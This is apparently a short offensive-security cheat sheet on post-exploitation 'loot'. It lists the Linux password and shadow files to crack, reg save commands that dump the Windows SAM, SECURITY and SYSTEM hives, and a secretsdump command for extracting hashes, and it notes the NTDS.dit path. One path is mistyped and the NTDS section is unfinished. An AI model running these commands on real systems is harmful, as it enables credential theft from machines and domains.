Loot
Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑
Linux
Dump users and passwords
Collect files on target
/etc/passwd
/erc/shadowThen unshadow and crack them.
Windows
Dump SAM
Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\systemThen crack them using Impackets' secretsdump
secretsdump.py -sam sam -security security -system system LOCALDump NTDS (DC)
By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
TODO (see /13-misc/impacket.md)
Last updated